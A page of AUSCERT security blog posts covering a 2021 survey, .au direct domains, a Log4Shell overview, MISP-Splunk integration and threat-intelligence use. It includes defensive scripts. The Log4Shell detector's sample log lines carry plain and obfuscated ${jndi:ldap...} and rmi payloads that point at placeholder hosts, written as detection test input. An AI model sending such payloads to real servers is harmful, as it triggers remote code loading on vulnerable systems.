Blogs

BDO and AUSCERT Cyber Security Survey Report 2021

BDO and AUSCERT say the federal government’s technology investment boost is a good first step to heighten the resilience of Australian businesses. However, there is a need for business guidance to avoid another ‘pink batts’ fiasco. The emergence of questionable ‘pop-up’ providers is a reality, say the industry experts.

On 29 March 2022, as part of the 2022–23 Budget, the Australian Government announced it will support small business via the Small Business Technology Investment Boost and Small Business Skills and Training Boost. Small businesses with annual turnover of less than $50 million will be able to deduct 120% of eligible training and assets, such as cyber security systems or subscriptions to cloud-based services, in their 2022–23 tax return. AUSCERT and BDO are calling for guidance to be provided for SMEs looking to take advantage of the government incentives, to mitigate the chance of inadequate governance.

“AUSCERT recognises the significance of the latest federal government announcement and hopes the promise will be matched equally by delivery,” said AUSCERT Director David Stockdale. “While it is easy for a government in the run-up to an election to make promises, the true benefit is in recognising the needs of SMEs and then delivering the training that will lift the cyber security posture of these organisations. This is a huge task, and with additional pressures on the already stretched Australian Cyber Security Centre to be actively involved with additional critical infrastructure requirements amongst other things, it will fall to the private sector to fill the gap.”

“Helping SMEs to understand the threats, assess their own risk landscape and implement proportional controls is critical, and is no easy task. Risk management and cybercrime awareness aren’t the core business of most SMEs, and history has shown that even large corporates can fall victim to wide-scale breaches if inadequate governance is in place over contractors such as managed Cyber Security Operations Centres,” noted David. “Training, and regulation of the training, needs to address these knowledge gaps – let’s hope we do not see providers peddling a ‘silver bullet’ course and we find ourselves looking back and seeing another ‘pink batts’ fiasco.”

The latest BDO and AUSCERT Cyber Security Survey found incidents requiring data recovery efforts also rose by 160% from 2020, suggesting that cyber attacks are becoming more destructive and laser-focused.

BDO Partner and National Cyber Security Leader Leon Fouche said, “The technology investment boost is a great first step to heighten the resilience of Australian businesses. However, the government announcements to help drive training create a ripe environment for ineffective training and providers to pop up.”

The BDO and AUSCERT survey found that 2021 saw a staggering 175% increase in data breaches caused by accidental emails, such as ‘CC’ing’ instead of ‘BCC’ing’, indicating that staff security awareness training may not be as robust as needed in the wake of remote working arrangements.

“With the steady increase in working remotely driven by the pandemic there is growing awareness of the need for training,” said Leon. “Indeed, our report showed that 1 in 4 organisations have invested in some form of cyber awareness training. Yet most organisations don’t have a chief security officer, or specialist security contractor on speed dial to keep up with the rapidly changing landscape of cyber threats, so the government will need to be able to provide SMEs with a starting point and ongoing support to really help these incentives be impactful.”

The BDO and AUSCERT Cyber Security Survey found that 60% of organisations use some form of cyber threat intelligence, meaning those who are not continually learning about new cyber threats are lagging behind their peers. The survey identified several steps businesses can take to significantly lessen cyber incidents, including onboarding Security Operations Centres, implementing Cyber Awareness Training, undertaking Supply Chain Risk Assessments, and creating Cyber Incident Response Plans.

“No doubt the incentives announced by the government will drive SMEs signing on to training and purchasing assets,” commented Leon, “whether this means a business’s first training course for their staff or upskilling of those employees who already have some awareness training. What is key is guidance on how business can best invest so their efforts are most effective, including avoiding investment in poor training or assets.”

BDO forensic expert Stan Gallo said, “Rather than just handing money to the SME owners and leaving them to it, an alternative approach might be to first guide them to where they can discuss the possibilities and get advice on technology investment that can take their business to the next level. There is a lot more to digital evolution than a flashy website or a cloud subscription and throwing money at SME business.”

Stan noted that the Technology Investment Boost will be a great opportunity to enhance cyber security, but hardly revolutionary.

“The Technology Investment Boost is terrific for innovative tech-driven start-ups and entrepreneurial business, but mature SMEs looking to grow still need to understand the basics of how technology can enhance their business, in addition to standard backend operations. Many people that have laboured over the years and built up a successful business, particularly in traditionally non-technology-driven areas, still need assistance to understand technology investment and how it can add value to their business operations.”

“There is an increased risk the money will be spent on standard IT support and lacklustre training provided by questionable ‘pop-up’ providers,” cautioned Stan.

“The types of threats we are seeing continue to evolve in line with current events and technologies, but at their core, there remain many similarities. Phishing, ransomware encryption, business email compromise and data theft are still ever present,” noted Stan. “However, there has been some insidious countermovement. For example, on the back of a growing trend of heightened preparedness and recoverability, thereby denying ransom payments, the ‘standard’ ransomware attack is now regularly linked to an initial theft of data to provide two bites at the cherry. If the victim is not going to pay the ransom, then maybe they will pay to get their confidential data back. As usual there are no guarantees either way.”

You can view a copy of the BDO and AUSCERT Cyber Security Survey at the following link: Cyber Survey Report 2021


.au Direct Domain names are a new option for Australian internet users

From 24 March 2022, the Australian Domain Administration (auDA) will be introducing a new option for Australian internet users with the availability of .au direct domain names. The shorter and simpler domain names (such as pavlova.au, station.au and so on) will be open to individuals and organisations that wish to have an online presence, new or existing, with the proviso that they have a verified connection to Australia.

Whilst offering convenience for businesses and individuals, it also presents an opportunity for cybercriminals to create malicious domains. At AUSCERT, it’s our purpose to understand just what those threats might be and to provide our members with an analysis of the situation. While it is impossible to completely prevent all kinds of domain name abuse, the requirements auDA has in place (such as registrants needing to have an ‘Australian presence’) certainly help mitigate widespread and easy abuse (as is prevalent in many other jurisdictions).

auDA has extensive resources available should you wish to learn more, including detailed information regarding registering domain names in .au direct, timelines, domain conflict resolution and so on. In addition, you can contact your preferred domain retailer. However, in brief, some points of note are:

- auDA continues with its strict rules against .au domains being used in any malicious or illegal activities and will take action against recognised offenders.
- auDA will provide priority registration to those organisations with existing registered domains to the same name in ‘.au’. For example, here at AUSCERT, we have ‘auscert.org.au’, which gives us priority to register and use ‘auscert.au’. This priority period is for six months from the launch date (24 March 2022) to register the ‘.au’ domain, after which it becomes available to anyone. Essentially, this means you have until 20 September 2022 to register the ‘.au’ version of any existing domain names you wish to protect.
- An ‘Australian presence’ will be required to register a .au direct domain and essentially requires one of: an ABN; a trademark number; or an Australian identification document (passport, driver’s licence, etc.).

So, what does this mean for you?

- Be aware that the .au direct domains are being launched on 24 March 2022.
- Consider which of your existing domains you may wish to register in .au direct. We encourage all members wishing to undertake this process to do so within six months to avoid any potential issues arising later.
- Determine whether there may be any potential conflicts with other domain name registrants and understand the auDA process for resolving the conflicts. Check the auDA website for complete details.
- Contact your preferred domain retailer to register your new domains.
- Consider which new (rather than existing) domain names you may wish to register.
- Be aware that the opening up of a new domain space always provides a potential for the resurgence of domain abuse (such as domain squatting, phishing, etc.) and take pre-emptive measures such as defensive registration of your names in the new domain space.

Please contact the team at AUSCERT if you have any security-related questions relating to the introduction of .au direct domains you believe we can assist with. All other questions concerning, for example, domain registration, conflict resolution and so on are best dealt with by reviewing auDA’s or your retailer’s .au direct resources.
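The following script is an added example written for this article, not auDA's or AUSCERT's code, to turn the advice above into a repeatable check: it collapses an existing domain inventory to the .au direct names worth registering, and flags any of those names that already resolve in DNS (a sign that someone else has registered the name and that the auDA conflict process, or an abuse report, may be needed). The inventory is constructed for the example, the set of priority 2LDs is an assumption for illustration (check auDA's published rules for the authoritative list), and the DNS check is injectable so it can be run without network access.

```python
import socket

# 2LDs whose existing registrants could claim priority for the matching .au
# direct name. Assumed for this example; check auDA's rules for the full list.
PRIORITY_2LDS = ("com.au", "net.au", "org.au", "asn.au", "id.au")


def direct_name(domain):
    """Map an existing 2LD registration to its .au direct equivalent.

    Returns None for names outside the priority 2LDs and for sub-domains:
    host.example.com.au is a host record, not a registration, so it carries
    no priority of its own.
    """
    d = domain.strip().lower().rstrip(".")
    for tld in PRIORITY_2LDS:
        suffix = "." + tld
        if d.endswith(suffix):
            label = d[: -len(suffix)]
            return None if (not label or "." in label) else label + ".au"
    return None


def register_plan(inventory):
    """Collapse a domain inventory to the .au names worth registering.

    Returns {direct_name: [existing registrations that map to it]}. Several
    2LD names (example.com.au, example.net.au) collapse to the one .au name,
    so the plan is usually much shorter than the inventory.
    """
    plan = {}
    for dom in inventory:
        target = direct_name(dom)
        if target:
            plan.setdefault(target, []).append(dom.strip().lower())
    return plan


def already_taken(names, resolve=socket.gethostbyname):
    """Return the subset of names that already resolve in DNS.

    A .au name that resolves before you registered it was registered by
    someone else: either a legitimate contender for auDA's conflict process
    or a squatter to report. `resolve` is injectable so the check can be
    exercised offline; the default does a real lookup.
    """
    taken = []
    for name in names:
        try:
            resolve(name)
            taken.append(name)
        except OSError:  # NXDOMAIN and other resolver failures
            pass
    return taken


# Constructed inventory for this example, not a real registrant's list.
INVENTORY = [
    "example.com.au", "Example.net.au", "example.org.au",
    "shop.example.com.au", "example-help.com.au", "example.edu.au",
]

if __name__ == "__main__":
    plan = register_plan(INVENTORY)
    for target, sources in sorted(plan.items()):
        print(target, "<-", ", ".join(sources))
    for name in already_taken(sorted(plan)):
        print("already resolves, investigate:", name)
```

Feed it the export from your registrar or DNS hosting rather than a hand-typed list, and run the resolution check again after the priority period closes: a name that starts resolving after 20 September 2022 without your registration is the squatting case the post warns about.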


Log4Shell-Logjam Overview

Picture credit: Lunasec[1]

TL;DR: patch, check your patches work, and check your logs for attempts and possible compromise.

Log4Shell is the tag used by Lunasec[1] to describe the vulnerability in Apache Log4j 2 that was disclosed abruptly by a tweet[2] and a GitHub repository. The flaw is in Log4j's message lookup feature: an attacker-controlled string such as ${jndi:ldap://host/x} in any field that ends up being logged causes the library to perform a JNDI lookup and load code from the attacker's server. The sudden announcement left security professionals a short time frame to protect systems before other interested parties discovered, compromised and potentially took over those systems. Among the groups alerted were computer emergency response teams, which recognised the impact and came out with early advisories[3][4][5] that are either being updated or are being referenced by newer advisories[6].

The attack surface was of prime concern, and security professionals were exchanging ways to detect exposure through various third-party search results. One of the attack surface lists published early showed that Log4Shell, or LogJam, would affect a large number of systems[7][8]. Ways to detect affected servers were refined into scripts[9][10], and vendors also released tools to detect vulnerable servers through first-party scanning[11][12][13]. Scanning your own assets is not a concern, but unauthorised scanning by outside parties is. That activity was soon detected[14], and exploit payloads followed[15].

The manner in which the vulnerability was disclosed gave a short time frame for naming and grading. This was evident in the PSIRT initially only having release candidates[16][17], which were subsequently checked, with the finding that the first was not sufficient on its own and the second was required as well[18]. The vulnerability was later allocated CVE-2021-44228[19] and carries the PSIRT's analysis[20][21] of a CVSSv3 base score of a perfect 10.0 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H).

Before a full patch was available from the PSIRT[22], mitigations were collated[25] and a "vaccine" made available[23][24]: it uses the same lookup mechanism to turn the vulnerable feature off in a running process, giving an easy way to blunt the unauthorised scanning attempts that try to drop a malicious payload. No doubt there will be more numerous and extensive reports[26][27][28][29][30][31][32][33][34][35] made available by noted security organisations, as well as a plethora of resources listed to help[36][37], but the advice right now is as in the TL;DR: check your version[38][39], patch, check your patch, check your logs for attempts and possible compromise[40], and take remediation steps if any IoCs show up[41][42][43][44][45][46]. When checking versions, remember that Log4j is routinely bundled inside application archives, so look for embedded copies of the library and not only the packages your operating system reports. In a time span of no longer than a week, CVE-2021-44228 has gone from proof-of-concept drop to internet-wide scans to carrying crypto-coin miner payloads to now being found to carry ransomware payloads[47][48].

Finally, if your weekend was thought to be hectic as a result of this abrupt disclosure, send some positive thoughts to the three volunteers[49][50] who maintain a piece of code that the internet has come to depend on so much. These three volunteers have worked very hard to get us a patch as soon as possible[51]. As well, we would like to thank all the contributors that have made this article possible by submitting relevant links and articles to us.
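As an added illustration of the "check your logs for attempts" step, the detector below is example code written for this article; it is not part of the original post and is not taken from any of the tools cited above. It resolves nested Log4j 2 lookups innermost-first, which is how log4j-core interpolates them, so the obfuscations seen in the wild (${lower:j}, ${::-j}, ${env:UNSET:-j}, URL encoding) collapse back to ${jndi:...} before the check is made. The access-log lines are constructed for the example, only the lookups used in wild payloads are modelled, and the function names and the "<JNDI>" marker are this example's own.

```python
import re
import urllib.parse

# Innermost ${...} lookup: the body contains no nested braces.
_INNER = re.compile(r"\$\{([^{}]*)\}")


def _evaluate(body, hits):
    """Evaluate one innermost Log4j 2 lookup the way log4j-core would.

    Only the lookups abused for obfuscation are modelled: lower:, upper:, and
    the ":-default" fallback of an unresolvable lookup such as ${env:UNSET:-j}
    or ${::-j}. A jndi: body is the terminal payload: record its target and
    replace it with a brace-free marker so the resolution loop terminates.
    """
    prefix = body.lower()
    if prefix.startswith("jndi:"):
        hits.append(body[5:])
        return "<JNDI>"
    if prefix.startswith("lower:"):
        return body[6:].lower()
    if prefix.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return ""  # lookup we cannot evaluate offline (date:, sys:, ...)


def deobfuscate(line, max_rounds=16):
    """Return (normalised_text, [jndi targets]) for one log line.

    Lookups are resolved innermost-first and repeatedly, matching Log4j 2's
    nested interpolation. URL-encoded payloads are decoded first because most
    attempts arrive in request paths or headers. Each round removes at least
    one ${...} pair, so the loop always terminates; max_rounds just bounds the
    work on pathological input.
    """
    hits = []
    text = urllib.parse.unquote(line)
    for _ in range(max_rounds):
        text, n = _INNER.subn(lambda m: _evaluate(m.group(1), hits), text)
        if n == 0:
            break
    return text, hits


def scan(lines):
    """Run the detector over an iterable of log lines; one finding per hit."""
    findings = []
    for number, line in enumerate(lines, 1):
        _, hits = deobfuscate(line)
        for target in hits:
            findings.append({"line": number, "target": target})
    return findings


# Constructed sample log lines (not real captures): an Apache-style access log
# with a benign request, a plain ${jndi:...} probe, two obfuscated variants and
# a URL-encoded one in the User-Agent position.
SAMPLE_LOG = [
    '203.0.113.9 - - [11/Dec/2021:03:12:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [11/Dec/2021:03:12:02 +0000] "GET /${jndi:ldap://198.51.100.7:1389/a} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.9 - - [11/Dec/2021:03:12:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/b}"',
    '203.0.113.9 - - [11/Dec/2021:03:12:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${env:NOPE:-r}mi://198.51.100.7:1099/c}"',
    '203.0.113.9 - - [11/Dec/2021:03:12:05 +0000] "GET / HTTP/1.1" 200 512 "-" "%24%7Bjndi%3Adns%3A%2F%2Fexample.test%2Fd%7D"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f['line']}: JNDI lookup to {f['target']}")
```

Run it over web, proxy and application logs, not only the front-end access log: any field the application logs (headers, usernames, form values) is a delivery path. A hit records an attempt, not a compromise; the follow-up is to check for outbound connections from that host to the target recorded in the finding.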
[1] Lunasec advisory: https://www.lunasec.io/docs/blog/log4j-zero-day/
[2] Tweeted 0-day: https://twitter.com/P0rZ9/status/1468949890571337731
[3] NZ CERT: https://www.cert.govt.nz/it-specialists/advisories/log4j-rce-0-day-actively-exploited/
[4] AUSCERT ASB: https://portal.auscert.org.au/bulletins/ASB-2021.0244.2
[5] SingCERT: https://www.csa.gov.sg/en/singcert/Alerts/al-2021-070
[6] AUSCERT ESB: https://portal.auscert.org.au/bulletins/ESB-2021.4186
[7] Attack surface: https://github.com/YfryTchsGD/Log4jAttackSurface
[8] Randori blog: https://www.randori.com/blog/cve-2021-44228/
[9] log4j_rce_check: https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6
[10] Log4j2Scan: https://github.com/whwlsfb/Log4j2Scan
[11] Qualys detection: https://blog.qualys.com/vulnerabilities-threat-research/2021/12/10/apache-log4j2-zero-day-exploited-in-the-wild-log4shell
[12] SOC Prime: https://socprime.com/blog/cve-2021-44228-detection-notorious-zero-day-in-log4j-java-library/
[13] Imperva: https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/
[14] Log4j RCE attempts: https://gist.github.com/gnremy/c546c7911d5f876f263309d7161a7217
[15] Cloudflare blog: https://blog.cloudflare.com/actual-cve-2021-44228-payloads-captured-in-the-wild/
[16] PSIRT rc1: https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc1
[17] PSIRT rc2: https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.0-rc2
[18] CyberKendra: https://www.cyberkendra.com/2021/12/worst-log4j-rce-zeroday-dropped-on.html
[19] NVD: https://nvd.nist.gov/vuln/detail/CVE-2021-44228
[20] The Record: https://therecord.media/log4j-zero-day-gets-security-fix-just-as-scans-for-vulnerable-systems-ramp-up/
[21] PSIRT advisory: https://logging.apache.org/log4j/2.x/security.html
[22] PSIRT download: https://logging.apache.org/log4j/2.x/download.html
[23] Cybereason blog: https://www.cybereason.com/blog/cybereason-releases-vaccine-to-prevent-exploitation-of-apache-log4shell-vulnerability-cve-2021-44228
[24] Cybereason vaccine (Logout4Shell): https://github.com/Cybereason/Logout4Shell
[25] Dark Reading: https://www.darkreading.com/dr-tech/what-to-do-while-waiting-for-the-log4ju-updates
[26] Palo Alto Unit 42: https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/
[27] Cloudflare blog: https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/
[28] Cloudflare blog: https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
[29] Sygnia advisory: https://blog.sygnia.co/log4shell-remote-code-execution-advisory
[30] SANS ISC diary: https://isc.sans.edu/forums/diary/RCE+in+log4j+Log4Shell+or+how+things+can+get+bad+quickly/28120/
[31] SANS ISC diary: https://isc.sans.edu/forums/diary/Log4j+Log4Shell+Followup+What+we+see+and+how+to+defend+and+how+to+access+our+data/28122/
[32] CrowdStrike: https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/
[33] Bleeping Computer: https://www.bleepingcomputer.com/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/
[34] TrustedSec: https://www.trustedsec.com/blog/log4j-playbook/
[35] Bleeping Computer: https://www.bleepingcomputer.com/news/security/log4j-list-of-vulnerable-products-and-vendor-advisories/
[36] Reddit list of resources on log4j: https://www.reddit.com/r/netsec/comments/rcwws9/rce_0day_exploit_found_in_log4j_a_popular_java/
[37] CVE-2021-44228-Log4Shell-Hashes: https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes
[38] NCSC-NL: https://github.com/NCSC-NL/log4shell
[39] BlueTeam CheatSheet: https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
[40] log4shell-detector: https://github.com/Neo23x0/log4shell-detector
[41] MalwareBazaar: https://bazaar.abuse.ch/browse/tag/log4j
[42] URLhaus: https://urlhaus.abuse.ch/browse/tag/log4j
[43] ThreatFox: https://threatfox.abuse.ch/browse/tag/log4j
[44] Curated Intel: https://github.com/curated-intel/Log4Shell-IOCs
[45] Microsoft guidance: https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/
[46] TryHackMe: https://tryhackme.com/room/solar
[47] Twitter (@80vul): https://twitter.com/80vul/status/1470272820571963392?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Etweet
[48] Twitter (@ankit_anubhav): https://twitter.com/ankit_anubhav/status/1470648109625536515
[49] Twitter (@FiloSottile): https://twitter.com/FiloSottile/status/1469441487175880711
[50] Twitter (@matthew_d_green): https://twitter.com/matthew_d_green/status/1469715416549367812
[51] iTnews: https://www.itnews.com.au/news/log4js-project-sponsorship-skyrockets-after-critical-bug-exploitation-573914


Setting up MISP as a threat information source for Splunk Enterprise

By Nicholas Soysa, AUSCERT

Disclaimer: The following information is only relevant to AUSCERT members who are formally part of the CAUDIT-ISAC or AUSCERT-ISAC. For more info on this optional add-on service, please refer to the following page.

1. Get a licence or free trial account.
If you’re an existing Splunk customer, then you should already have the credentials to access Splunk. If you’re keen on trying it out first, you can obtain a limited free trial account at https://www.splunk.com/en_us/download.html.

2. Install and run Splunk Enterprise.
Download the appropriate installer for your platform (32- or 64-bit) and follow the installation steps. Launch the Splunk Enterprise search head and log into your Splunk administrator account.

IMPORTANT: misp42splunk 4.3.0 has been merged into the master branch. The information in section 3 is no longer relevant: update misp42splunk using the “Upgrade App” (existing app) or “Install” (fresh install) option, as usual.

3. Install and set up misp42splunk (superseded; kept for reference).
misp42splunk 2.2.0 is not currently in the master branch. Until it is merged, download the file from the GitHub repo at https://github.com/remg427/misp42splunk/tree/2.2.0, then:
- Extract the ZIP archive.
- Convert the folder “misp42splunk” to TAR.GZ format using a utility like 7-Zip or the command line.
- Return to the Splunk web interface and navigate to “Apps”.
- Select the “Install App from file” option.
- Select the archive misp42splunk.tar.gz which you created and click Upload.
- Restart Splunk when prompted.

4. Add a MISP instance.
- Create a MISP instance name, for example “AUSCERTMISP”.
- MISP URL = base URL of the MISP instance (e.g. https://misp-c.auscert.org.au or https://misp.auscert.org.au).
- For “Set the MISP auth key”, enter a valid API key for a MISP user which has authkey access privileges. This is typically any user with “User” up to “Org admin” roles. The key grants Splunk everything that user can do in MISP, so use a dedicated account with the least privileged role that can still fetch attributes, rather than an administrator’s personal key.
- Untick the “Check SSL certificate of MISP server” box. Only do this if your Splunk host genuinely cannot validate the certificate the MISP instance presents; with the check disabled, the auth key is sent to whatever answers at that URL, so leave it ticked wherever the certificate validates.
- We no longer require a client certificate to authenticate, so untick “Use a client certificate” if it is ticked.
- Press “Save”. Once the save is completed, you will be returned to the Apps page.

5. Check it works.
- Navigate to the MISP42 app (Apps dropdown -> MISP42).
- In the MISP42 app page, select Reports.
- Then select, for example: mispgetioc misp_instance=AUSCERTMISP last=1d
- If the app works, you should see Attributes from MISP events returned in the report.
It is suggested to store the feed in an index which can then be queried in future if needed.

6. Resources
CAUDIT-ISAC users can access the PDF version at: https://wordpress-admin.auscert.org.au/publications/2018-08-22-misp-integration (member portal login required)
AUSCERT-ISAC users can access the document at: https://wordpress-admin.auscert.org.au/publications/2019-03-04-misp-integration (member portal login required)

7. Credits
Thanks to Remi Seguy (author of misp42splunk) for promptly implementing this feature request.


APCERT CYBER DRILL 2021

The progression toward a growing reliance on the e-economy within the Asia Pacific region requires ongoing protection of the various infrastructures integral to political and economic stability and security. The Asia Pacific Computer Emergency Response Team (APCERT) recently conducted its annual drill, a means of maintaining and improving awareness and skills within the cyber security community through this collaborative undertaking. This year’s theme, “Supply Chain Attack Through Spear-Phishing – Beware of Working from Home”, reflects real-world incidents and issues experienced globally.

As a founding member, AUSCERT has participated in every drill since their inception, with Operations Manager Geoff Thonon stating that the drill is “more important than ever”. “Whilst there is a time limit, the purpose of the drill isn’t to identify the fastest (CERT) team but rather to work collaboratively to challenge and develop everyone’s skills”, Geoff continued. The experiences and tasks of each participating team allow for knowledge sharing, since no two CERTs typically experience the same issues or provide like-for-like services.

The APCERT drill aims to maintain and progress internet security and safety, with the exercise providing participants the chance to improve communication protocols, technical responses and the overall quality of incident responses. Although undertaken in a few hours, the lessons learned from the experience can continue long after. Analysing the challenges, choices and responses of teams provides an insight into the perspectives of other participants. “The information available to each team from the drill provides a greater understanding of the how and why that can lead to year-round training and development for staff”, Geoff stated.

With 26 CERTs from 20 economies within the Asia Pacific region taking part, there is a wealth of knowledge and experience to draw upon in the quest for ongoing learning and growth within the sector. As each drill typically requires six to eight months of planning and preparation, work on the 2022 APCERT Cyber Drill will soon be underway; the ongoing need for education and skill enhancement is a reflection of the rapid development of the digital world we now reside in.


Using threat intelligence to produce a cyber defence strategy

Very few practitioners need to be told about contemporary cyber threats such as ransomware; it has found its way into the common language of risk assessments, disaster recovery plans and mainstream media alike. But what can be done other than writing playbooks and practising response plans, following the Essential Eight and blocking known malicious indicators?

Those organisations with a strategic approach to cyber defence are more likely to survive a ransomware attack, and consideration of an attacker’s motive may be key to mounting a successful defence. For example, if the motive is purely financial and the attacker causes significant business disruption if the ransom demand is not met, what controls can prevent this? If instead the motive is to hold to ransom the intellectual property, customer database or another information asset, should priority be given to controls which detect and mitigate data exfiltration? Whilst senior management’s risk tolerance may be “we must implement all possible countermeasures,” few organisations will have the luxury of doing so.

Utilising available data sets to form cyber threat intelligence can help mitigate harmful events such as ransomware attacks. Most importantly, doing so is within the reach of most organisations following the explosion of available open-source tools and data sets. At the “tactical” level, cyber threat intelligence usually consists of Indicators of Compromise (IoCs): technical data such as known-bad IP addresses, URLs, email addresses and file hashes. Here is where the value proposition of CERTs (Computer Emergency Response Teams) pays off: as not-for-profit organisations providing open-source and member-funded services, with passionate teams consisting of analyst, dev-ops and engagement functions, CERTs are trustworthy due to their independent status.

CIRCL from Luxembourg famously produces the Malware Information Sharing Platform (MISP) and tactical data feeds, used worldwide by other CERTs including AUSCERT, governments and private enterprise. Many organisations do not have resources beyond the tactical level; however, simply using tactical feeds of IoCs has been shown to be effective in detecting or even preventing the initial stages of a ransomware attack. Relevant and concise IoCs may be used in content filters, centralised logging, SIEM or even custom-scripted solutions to hunt for or block threats. A feed is only as useful as it is precise: stale or overly broad indicators generate false positives, so favour high-confidence sources and keep the event or campaign each indicator came from alongside it, so that an alert carries its context. AUSCERT’s Malicious URL Feed is an example of a high-confidence, low-volume feed, usually consumed in an automated fashion but also suitable for manual threat hunting, depending upon the consumer’s available resources.

Members of AUSCERT’s MISP community can study operational intelligence such as attackers’ tools, techniques and procedures, even visually: a “mind map” connects similar events and data, allowing members to correlate campaigns and understand the techniques used in incidents such as ransomware attacks. Organisations can then form strategic plans regarding the risks associated with cyber threats.

Most importantly of all, a collaborative approach must be foremost in discussions regarding cyber defence strategy. A common misconception is that sharing threat information may compromise competitive advantage; however, a particular strength of CERTs is coordinating, anonymising and analysing incident data, and then providing operational intelligence to members, even entire sectors. Have you included your local CERT in your IR (Incident Response) plans?

Mike Holm, Senior Manager, AUSCERT
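The "custom-scripted" use of tactical IoCs described above, and the suggestion in the MISP-for-Splunk walkthrough earlier on this page to keep the fetched attributes somewhere they can be queried later, both come down to the same job: normalise a MISP attribute set into lookup structures and run logs against it. The block below is an added example written for this article, not AUSCERT's, CIRCL's or misp42splunk's code. The MISP response is constructed in the shape of an attributes/restSearch result, the proxy log format is an assumption made for the example, and only the attribute types a first hunt usually needs (ip-dst, ip-src including CIDR, domain/hostname, url) are handled; file hashes would slot in the same way against a file or EDR log.

```python
import ipaddress
import json
from urllib.parse import urlsplit


def _norm_host(host):
    return host.lower().rstrip(".")


def _norm_url(url):
    """scheme://host/path?query with a lowercased host and no default port, so
    an indicator and a log entry for the same resource compare equal."""
    p = urlsplit(url.strip())
    host = _norm_host(p.hostname or "")
    if p.port and p.port not in (80, 443):
        host = f"{host}:{p.port}"
    query = f"?{p.query}" if p.query else ""
    return f"{p.scheme.lower()}://{host}{p.path or '/'}{query}"


def load_indicators(misp_json):
    """Turn a MISP restSearch response into lookup structures.

    Only attributes flagged to_ids are used: analysts set that flag on values
    meant for automated detection and clear it on context-only data, so
    ignoring it is the quickest way to drown in false positives.
    """
    ind = {"ip": {}, "net": [], "domain": {}, "url": {}}
    for a in json.loads(misp_json)["response"]["Attribute"]:
        if not a.get("to_ids"):
            continue
        ctx = {"type": a["type"], "value": a["value"], "event": a["Event"]["info"]}
        if a["type"] in ("ip-dst", "ip-src"):
            if "/" in a["value"]:
                ind["net"].append((ipaddress.ip_network(a["value"], strict=False), ctx))
            else:
                ind["ip"][a["value"]] = ctx
        elif a["type"] in ("domain", "hostname"):
            ind["domain"][_norm_host(a["value"])] = ctx
        elif a["type"] == "url":
            ind["url"][_norm_url(a["value"])] = ctx
    return ind


def match_host(host, ind):
    """Exact IP, CIDR, exact-domain or parent-domain match for one host."""
    host = _norm_host(host)
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        addr = None
    if addr is not None:
        if host in ind["ip"]:
            return ind["ip"][host]
        return next((ctx for net, ctx in ind["net"] if addr in net), None)
    # Walk up the labels so mail.evil.example matches the indicator evil.example,
    # stopping before the bare TLD.
    labels = host.split(".")
    for i in range(len(labels) - 1):
        ctx = ind["domain"].get(".".join(labels[i:]))
        if ctx is not None:
            return ctx
    return None


def hunt(log_lines, ind):
    """Assumed proxy log format (constructed): '<ts> <client> <method> <url> <status>'."""
    findings = []
    for n, line in enumerate(log_lines, 1):
        _ts, client, _method, url, _status = line.split()
        ctx = match_host(urlsplit(url).hostname or "", ind) or ind["url"].get(_norm_url(url))
        if ctx is not None:
            findings.append({"line": n, "client": client, "indicator": ctx["value"], "event": ctx["event"]})
    return findings


# Constructed MISP response (not real feed data), shaped like attributes/restSearch output.
MISP_RESPONSE = json.dumps({"response": {"Attribute": [
    {"type": "ip-dst", "value": "198.51.100.23", "to_ids": True,
     "Event": {"id": "101", "info": "constructed: ransomware C2 infrastructure"}},
    {"type": "ip-dst", "value": "203.0.113.0/28", "to_ids": True,
     "Event": {"id": "101", "info": "constructed: ransomware C2 infrastructure"}},
    {"type": "domain", "value": "Update-Portal.example.", "to_ids": True,
     "Event": {"id": "102", "info": "constructed: credential phishing campaign"}},
    {"type": "url", "value": "http://cdn.example.net/stage/loader.php?id=1", "to_ids": True,
     "Event": {"id": "103", "info": "constructed: loader distribution"}},
    {"type": "domain", "value": "benign-research.example", "to_ids": False,
     "Event": {"id": "103", "info": "constructed: loader distribution"}},
]}})

# Constructed proxy log lines for the example.
PROXY_LOG = [
    "2021-11-02T09:14:01Z 10.0.0.15 GET https://www.example.org/ 200",
    "2021-11-02T09:14:07Z 10.0.0.15 GET http://198.51.100.23/gate.php 200",
    "2021-11-02T09:15:22Z 10.0.0.31 GET https://mail.update-portal.example/login 200",
    "2021-11-02T09:16:40Z 10.0.0.31 GET http://cdn.example.net/stage/loader.php?id=1 200",
    "2021-11-02T09:17:03Z 10.0.0.42 GET http://203.0.113.9:8080/x 503",
    "2021-11-02T09:18:11Z 10.0.0.42 GET https://benign-research.example/ 200",
]

if __name__ == "__main__":
    for f in hunt(PROXY_LOG, load_indicators(MISP_RESPONSE)):
        print(f"line {f['line']} client {f['client']}: {f['indicator']} ({f['event']})")
```

Each finding carries the MISP event's title, which is the context an analyst needs to triage it; when the same structures are loaded into a SIEM lookup, keep that column. The parent-domain walk and CIDR match are what make a short, high-confidence feed catch hosts the feed author never listed explicitly.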


AUSCERT2021 Information Security Excellence Winner

